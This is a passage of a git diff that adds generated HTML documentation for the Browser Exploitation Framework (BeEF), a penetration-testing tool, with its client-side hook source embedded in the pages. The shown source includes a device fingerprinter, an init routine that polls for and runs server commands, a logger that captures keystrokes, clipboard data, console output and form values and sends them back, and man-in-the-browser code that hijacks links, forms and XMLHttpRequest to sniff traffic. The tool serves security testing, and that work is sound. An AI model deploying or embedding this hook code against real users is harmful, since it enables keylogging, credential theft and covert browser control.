if (screen.width == 1366 &amp;&amp; screen.height == 768) return true;
// Netbooks
if (screen.width == 1024 &amp;&amp; screen.height == 600) return true;
return false;
},
/**
* Is Nokia?
* @return {Boolean} true or false.
*/
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)|(Lumia )')) ? true : false;
},
/**
* Is Zune?
* @return {Boolean} true or false.
*/
isZune: function() {
return (this.ua.match('ZuneWP7')) ? true : false;
},
/**
* Is HTC?
* @return {Boolean} true or false.
*/
isHtc: function() {
return (this.ua.match('HTC')) ? true : false;
},
/**
* Is Ericsson?
* @return {Boolean} true or false.
*/
isEricsson: function() {
return (this.ua.match('Ericsson')) ? true : false;
},
/**
* Is Motorola?
* @return {Boolean} true or false.
*/
isMotorola: function() {
return (this.ua.match('Motorola')) ? true : false;
},
/**
* Is Google?
* @return {Boolean} true or false.
*/
isGoogle: function() {
return (this.ua.match('Nexus One')) ? true : false;
},
/**
* Returns true if the browser is on a Mobile device
* @return {Boolean} true or false
*
* @example: if(beef.hardware.isMobileDevice()) { ... }
*/
isMobileDevice: function() {
return MobileEsp.DetectMobileQuick();
},
/**
* Returns true if the browser is on a game console
* @return {Boolean} true or false
*
* @example: if(beef.hardware.isGameConsole()) { ... }
*/
isGameConsole: function() {
return MobileEsp.DetectGameConsole();
},
getName: function() {
var ua = navigator.userAgent.toLowerCase();
if(MobileEsp.DetectIphone()) { return "iPhone"};
if(MobileEsp.DetectIpod()) { return "iPod Touch"};
if(MobileEsp.DetectIpad()) { return "iPad"};
if (this.isHtc()) { return 'HTC'};
if (this.isMotorola()) { return 'Motorola'};
if (this.isZune()) { return 'Zune'};
if (this.isGoogle()) { return 'Google Nexus One'};
if (this.isEricsson()) { return 'Ericsson'};
if(MobileEsp.DetectAndroidPhone()) { return "Android Phone"};
if(MobileEsp.DetectAndroidTablet()) { return "Android Tablet"};
if(MobileEsp.DetectS60OssBrowser()) { return "Nokia S60 Open Source"};
if(ua.search(MobileEsp.deviceS60) > -1) { return "Nokia S60"};
if(ua.search(MobileEsp.deviceS70) > -1) { return "Nokia S70"};
if(ua.search(MobileEsp.deviceS80) > -1) { return "Nokia S80"};
if(ua.search(MobileEsp.deviceS90) > -1) { return "Nokia S90"};
if(ua.search(MobileEsp.deviceSymbian) > -1) { return "Nokia Symbian"};
if (this.isNokia()) { return 'Nokia'};
if(MobileEsp.DetectWindowsPhone7()) { return "Windows Phone 7"};
if(MobileEsp.DetectWindowsPhone8()) { return "Windows Phone 8"};
if(MobileEsp.DetectWindowsPhone10()) { return "Windows Phone 10"};
if(MobileEsp.DetectWindowsMobile()) { return "Windows Mobile"};
if(MobileEsp.DetectBlackBerryTablet()) { return "BlackBerry Tablet"};
if(MobileEsp.DetectBlackBerryWebKit()) { return "BlackBerry OS 6"};
if(MobileEsp.DetectBlackBerryTouch()) { return "BlackBerry Touch"};
if(MobileEsp.DetectBlackBerryHigh()) { return "BlackBerry OS 5"};
if(MobileEsp.DetectBlackBerry()) { return "BlackBerry"};
if(MobileEsp.DetectPalmOS()) { return "Palm OS"};
if(MobileEsp.DetectPalmWebOS()) { return "Palm Web OS"};
if(MobileEsp.DetectGarminNuvifone()) { return "Gamin Nuvifone"};
if(MobileEsp.DetectArchos()) { return "Archos"}
if(MobileEsp.DetectBrewDevice()) { return "Brew"};
if(MobileEsp.DetectDangerHiptop()) { return "Danger Hiptop"};
if(MobileEsp.DetectMaemoTablet()) { return "Maemo Tablet"};
if(MobileEsp.DetectSonyMylo()) { return "Sony Mylo"};
if(MobileEsp.DetectAmazonSilk()) { return "Kindle Fire"};
if(MobileEsp.DetectKindle()) { return "Kindle"};
if(MobileEsp.DetectSonyPlaystation()) { return "Playstation"};
if(ua.search(MobileEsp.deviceNintendoDs) > -1) { return "Nintendo DS"};
if(ua.search(MobileEsp.deviceWii) > -1) { return "Nintendo Wii"};
if(ua.search(MobileEsp.deviceNintendo) > -1) { return "Nintendo"};
if(MobileEsp.DetectXbox()) { return "Xbox"};
if(this.isLaptop()) { return "Laptop"};
if(this.isVirtualMachine()) { return "Virtual Machine"};
return 'Unknown';
}
};
beef.regCmp('beef.hardware');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

109
docs/index.html Normal file
View File

@@ -0,0 +1,109 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Home</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Home</h1>
<h3> </h3>
<section>
<article><p>===============================================================================</p>
<pre><code>Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
</code></pre>
<p>===============================================================================</p>
<h2>What is BeEF?</h2>
<p><strong>BeEF</strong> is short for <strong>The Browser Exploitation Framework</strong>. It is a penetration testing tool that focuses on the web browser.</p>
<p>Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.</p>
<h2>Get Involved</h2>
<p>You can get in touch with the BeEF team. Just check out the following:</p>
<p><strong>Please, send us pull requests!</strong></p>
<p><strong>Web:</strong> https://beefproject.com/</p>
<p><strong>Bugs:</strong> https://github.com/beefproject/beef/issues</p>
<p><strong>Security Bugs:</strong> security@beefproject.com</p>
<p><strong>IRC:</strong> ircs://irc.freenode.net/beefproject</p>
<p><strong>Twitter:</strong> @beefproject</p>
<h2>Requirements</h2>
<ul>
<li>Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.</li>
<li><a href="http://ruby-lang.org">Ruby</a>: 2.5 or newer</li>
<li><a href="http://sqlite.org">SQLite</a>: 3.x</li>
<li><a href="https://nodejs.org">Node.js</a>: 6 or newer</li>
<li>The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile</li>
<li>Selenium is required on OSX: brew install selenium-server-standalone (See https://github.com/shvets/selenium)</li>
</ul>
<h2>ActiveRecord</h2>
<p>ActiveRecord was used to replace DataMapper, and now ruby 2.4 is no longer supported.
If you're using ruby 2.4 please update your BeEF version, otherwise master-0.4.7.3 has the beef branch before the ActiveRecord Merge.</p>
<h2>Quick Start</h2>
<p><strong>The following is for the impatient.</strong></p>
<p>The <code>install</code> script installs the required operating system packages and all the prerequisite Ruby gems:</p>
<pre class="prettyprint source"><code>$ ./install
</code></pre>
<p>For full installation details, please refer to <a href="https://github.com/beefproject/beef/blob/master/INSTALL.txt">INSTALL.txt</a>.</p>
<p>We also have an <a href="https://github.com/beefproject/beef/wiki/Installation">Installation</a> page on the wiki.</p>
<p>Upon successful installation, be sure to read the <a href="https://github.com/beefproject/beef/wiki/Configuration">Configuration</a> page on the wiki for important details on configuring and securing BeEF.</p>
<h2>Usage</h2>
<p>To get started, simply execute beef and follow the instructions:</p>
<pre class="prettyprint source"><code>$ ./beef
</code></pre></article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

141
docs/init.js.html Normal file
View File

@@ -0,0 +1,141 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: init.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: init.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Contains the beef_init() method which starts the BeEF client-side
* logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
*
* If beef.pageIsLoaded is true, then this JS has been loaded >1 times
* and will have a new session id. The new session id will need to know
* the brwoser details. So sendback the browser details again.
*
* @namespace beef.init
*/
beef.session.get_hook_session_id();
if (beef.pageIsLoaded) {
beef.net.browser_details();
}
/**
* @memberof beef.init
*/
window.onload = function () {
beef_init();
};
/**
* @memberof beef.init
*/
window.onpopstate = function (event) {
if (beef.onpopstate.length > 0) {
event.preventDefault;
for (var i = 0; i &lt; beef.onpopstate.length; i++) {
var callback = beef.onpopstate[i];
try {
callback(event);
} catch (e) {
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
}
return false;
}
}
};
/**
* @memberof beef.init
*/
window.onclose = function (event) {
if (beef.onclose.length > 0) {
event.preventDefault;
for (var i = 0; i &lt; beef.onclose.length; i++) {
var callback = beef.onclose[i];
try {
callback(event);
} catch (e) {
beef.debug("window.onclose - couldn't execute callback: " + e.message);
}
return false;
}
}
};
/**
* Starts the polling mechanism, and initialize various components:
* - browser details (see browser.js) are sent back to the "/init" handler
* - the polling starts (checks for new commands, and execute them)
* - the logger component is initialized (see logger.js)
* - the Autorun Engine is initialized (see are.js)
* @memberof beef.init
*/
function beef_init() {
if (!beef.pageIsLoaded) {
beef.pageIsLoaded = true;
beef.net.browser_details();
if (beef.browser.hasWebSocket() &amp;&amp; typeof beef.websocket != 'undefined') {
setTimeout(function(){
beef.websocket.start();
beef.updater.execute_commands();
beef.logger.start();
}, parseInt(beef.websocket.ws_connect_timeout));
}else {
beef.net.browser_details();
beef.updater.execute_commands();
beef.updater.check();
beef.logger.start();
}
}
}
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

1598
docs/lib_browser_jools.js.html Normal file
View File

File diff suppressed because it is too large Load Diff

1346
docs/lib_deployJava.js.html Normal file
View File

File diff suppressed because it is too large Load Diff

1269
docs/lib_platform.js.html Normal file
View File

File diff suppressed because it is too large Load Diff

412
docs/logger.js.html Normal file
View File

@@ -0,0 +1,412 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: logger.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: logger.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides logging capabilities.
* @namespace beef.logger
*/
beef.logger = {
running: false,
/**
* Internal logger id
*/
id: 0,
/**
* Holds events created by user, to be sent back to BeEF
*/
events: [],
/**
* Holds current stream of key presses
*/
stream: [],
/**
* Contains current target of key presses
*/
target: null,
/**
* Holds the time the logger was started
*/
time: null,
/**
* Holds the event details to be sent to BeEF
*/
e: function() {
this.id = beef.logger.get_id();
this.time = beef.logger.get_timestamp();
this.type = null;
this.x = 0;
this.y = 0;
this.target = null;
this.data = null;
this.mods = null;
},
/**
* Prevents from recursive event handling on form submission
*/
in_submit: false,
/**
* Starts the logger
*/
start: function() {
beef.browser.hookChildFrames();
this.running = true;
var d = new Date();
this.time = d.getTime();
$j(document).off('keypress');
$j(document).off('click');
$j(window).off('focus');
$j(window).off('blur');
$j('form').off('submit');
$j(document.body).off('copy');
$j(document.body).off('cut');
$j(document.body).off('paste');
if (!!window.console &amp;&amp; typeof window.console == "object") {
try {
var oldInfo = window.console.info;
console.info = function (message) {
beef.logger.console('info', message);
oldInfo.apply(console, arguments);
};
var oldLog = window.console.log;
console.log = function (message) {
beef.logger.console('log', message);
oldLog.apply(console, arguments);
};
var oldWarn = window.console.warn;
console.warn = function (message) {
beef.logger.console('warn', message);
oldWarn.apply(console, arguments);
};
var oldDebug = window.console.debug;
console.debug = function (message) {
beef.logger.console('debug', message);
oldDebug.apply(console, arguments);
};
var oldError = window.console.error;
console.error = function (message) {
beef.logger.console('error', message);
oldError.apply(console, arguments);
};
} catch(e) {}
}
$j(document).keypress(
function(e) { beef.logger.keypress(e); }
).click(
function(e) { beef.logger.click(e); }
);
$j(window).focus(
function(e) { beef.logger.win_focus(e); }
).blur(
function(e) { beef.logger.win_blur(e); }
);
$j('form').submit(
function(e) {
beef.logger.submit(e);
}
);
$j(document.body).on('copy', function() {
setTimeout("beef.logger.copy();", 10);
});
$j(document.body).on('cut', function() {
setTimeout("beef.logger.cut();", 10);
});
$j(document.body).on('paste', function() {
beef.logger.paste();
});
},
/**
* Stops the logger
*/
stop: function() {
this.running = false;
clearInterval(this.timer);
$j(document).off('keypress');
$j(document).off('click');
$j(window).off('focus');
$j(window).off('blur');
$j('form').off('submit');
$j(document.body).off('copy');
$j(document.body).off('cut');
$j(document.body).off('paste');
// TODO: reset console
},
/**
* Get id
*/
get_id: function() {
this.id++;
return this.id;
},
/**
* Click function fires when the user clicks the mouse.
*/
click: function(e) {
var c = new beef.logger.e();
c.type = 'click';
c.x = e.pageX;
c.y = e.pageY;
c.target = beef.logger.get_dom_identifier(e.target);
this.events.push(c);
},
/**
* Fires when the window element has regained focus
*/
win_focus: function(e) {
var f = new beef.logger.e();
f.type = 'focus';
this.events.push(f);
},
/**
* Fires when the window element has lost focus
*/
win_blur: function(e) {
var b = new beef.logger.e();
b.type = 'blur';
this.events.push(b);
},
/**
* Keypress function fires everytime a key is pressed.
* @param {Object} e: event object
*/
keypress: function(e) {
if (this.target == null || ($j(this.target).get(0) !== $j(e.target).get(0)))
{
beef.logger.push_stream();
this.target = e.target;
}
this.stream.push({'char':e.which, 'modifiers': {'alt':e.altKey, 'ctrl':e.ctrlKey, 'shift':e.shiftKey}});
},
/**
* Copy function fires when the user copies data to the clipboard.
*/
copy: function(x) {
try {
var c = new beef.logger.e();
c.type = 'copy';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Cut function fires when the user cuts data to the clipboard.
*/
cut: function() {
try {
var c = new beef.logger.e();
c.type = 'cut';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Console function fires when data is sent to the browser console.
*/
console: function(type, message) {
try {
var c = new beef.logger.e();
c.type = 'console';
c.data = type + ': ' + message;
this.events.push(c);
} catch(e) {}
},
/**
* Paste function fires when the user pastes data from the clipboard.
*/
paste: function() {
try {
var c = new beef.logger.e();
c.type = 'paste';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Submit function fires whenever a form is submitted
* TODO: Cleanup this function
*/
submit: function(e) {
if (beef.logger.in_submit) {
return true;
}
try {
var f = new beef.logger.e();
f.type = 'submit';
f.target = beef.logger.get_dom_identifier(e.target);
var jqForms = $j(e.target);
var values = jqForms.find('input').map(function() {
var inp = $j(this);
return inp.attr('name') + '=' + inp.val();
}).get().join();
beef.debug('submitting form inputs: ' + values);
/*
for (var i = 0; i &lt; e.target.elements.length; i++) {
values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
}
*/
f.data = 'Action: '+jqForms.attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
this.events.push(f);
this.queue();
this.target = null;
beef.net.flush(function done() {
beef.debug("Submitting the form");
beef.logger.in_submit = true;
jqForms.submit();
beef.logger.in_submit = false;
beef.debug("Done submitting");
});
e.preventDefault();
return false;
} catch(e) {}
},
/**
* Pushes the current stream to the events queue
*/
push_stream: function() {
if (this.stream.length > 0)
{
this.events.push(beef.logger.parse_stream());
this.stream = [];
}
},
/**
* Translate DOM Object to a readable string
*/
get_dom_identifier: function(target) {
target = (target == null) ? this.target : target;
var id = '';
if (target)
{
id = target.tagName.toLowerCase();
id += ($j(target).attr('id')) ? '#'+$j(target).attr('id') : ' ';
id += ($j(target).attr('name')) ? '('+$j(target).attr('name')+')' : '';
}
return id;
},
/**
* Formats the timestamp
* @return {String} timestamp string
*/
get_timestamp: function() {
var d = new Date();
return ((d.getTime() - this.time) / 1000).toFixed(3);
},
/**
* Parses stream array and creates history string
*/
parse_stream: function() {
var s = '';
var mods = '';
for (var i in this.stream){
try{
var mod = this.stream[i]['modifiers'];
s += String.fromCharCode(this.stream[i]['char']);
if(typeof mod != 'undefined' &amp;&amp;
(mod['alt'] == true ||
mod['ctrl'] == true ||
mod['shift'] == true)){
mods += (mod['alt']) ? ' [Alt] ' : '';
mods += (mod['ctrl']) ? ' [Ctrl] ' : '';
mods += (mod['shift']) ? ' [Shift] ' : '';
mods += String.fromCharCode(this.stream[i]['char']);
}
}catch(e){}
}
var k = new beef.logger.e();
k.type = 'keys';
k.target = beef.logger.get_dom_identifier();
k.data = s;
k.mods = mods;
return k;
},
/**
* Queue results to be sent back to framework
*/
queue: function() {
beef.logger.push_stream();
if (this.events.length > 0)
{
beef.net.queue('/event', 0, this.events);
this.events = [];
}
}
};
beef.regCmp('beef.logger');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

297
docs/mitb.js.html Normal file
View File

@@ -0,0 +1,297 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: mitb.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: mitb.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* @namespace beef.mitb
*/
beef.mitb = {
cid:null,
curl:null,
/** Initializes */
init:function (cid, curl) {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var hook_file = "&lt;%= @hook_file %>";
if (window.XMLHttpRequest &amp;&amp; !(window.ActiveXObject)) {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
// Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
// or a request initiated by the MiTB itself.
if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
open.call(this, method, url, async, true);
}else {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
var requestPort;
if (portR != null) { requestPort = portR[0].split(":")[1]; }
//GET request
if (method == "GET") {
//GET request -> cross-origin
if (url.indexOf(document.location.hostname) == -1 || (portR != null &amp;&amp; requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}else { //GET request -> same-origin
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
// write the url of the page
history.pushState({ Be:"EF" }, title, url);
}
}
}else{
//POST request
beef.mitb.sniff("POST ajax request to: " + url);
open.call(this, method, url, async, true);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
/** Initializes the hook on anchors and forms. */
hook:function () {
beef.onpopstate.push(function (event) {
beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
});
beef.onclose.push(function (event) {
beef.mitb.endSession();
});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
var lis = document.getElementsByTagName("li");
for (var i = 0; i &lt; anchors.length; i++) {
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for (var i = 0; i &lt; forms.length; i++) {
beef.mitb.poisonForm(forms[i]);
}
for (var i = 0; i &lt; lis.length; i++) {
if (lis[i].hasAttribute("onclick")) {
lis[i].removeAttribute("onclick");
/*clear*/
lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
/*override*/
}
}
},
/** Hooks anchors and prevents them from linking away */
poisonAnchor:function (e) {
try {
e.preventDefault;
if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, e.currentTarget);
}
} catch (e) {
beef.debug('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
/** Hooks forms and prevents them from linking away */
poisonForm:function (form) {
form.onsubmit = function (e) {
// Collect &lt;input> tags.
var inputs = form.getElementsByTagName("input");
var query = "";
for (var i = 0; i &lt; inputs.length; i++) {
switch (inputs[i].type) {
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value + '&amp;';
break;
}
}
// Collect selected options from the form.
var selects = form.getElementsByTagName("select");
for (var i = 0; i &lt; selects.length; i++) {
var select = selects[i];
query += select.name + "=" + select.options[select.selectedIndex].value + '&amp;';
}
// We should be gathering 'submit' inputs as well, as there are
// applications demanding this parameter.
var submit = $j('*[type="submit"]', form);
if(submit.length) {
// Append name of the submit button/input.
query += submit.attr('name') + '=' + submit.attr('value');
}
if(query.slice(-1) == '&amp;') {
query = query.slice(0, -1);
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be:"EF" }, "", form.action);
return false;
}
},
/** Fetches a hooked form with AJAX */
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, true);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 &amp;&amp; y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
};
y.send(query);
beef.mitb.sniff("POST: " + url + "[" + query + "]");
return true;
} catch (x) {
return false;
}
},
/** Fetches a hooked link with AJAX */
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, true);
y.onreadystatechange = function () {
if (y.readyState == 4 &amp;&amp; y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
};
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
return false;
}
},
/** Fetches a window.location=http://domainname.com and setting up history */
fetchOnclick:function (url) {
try {
var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest();
y.open('GET', url, false, true);
y.onreadystatechange = function () {
if (y.readyState == 4 &amp;&amp; y.responseText != "") {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
}
else {
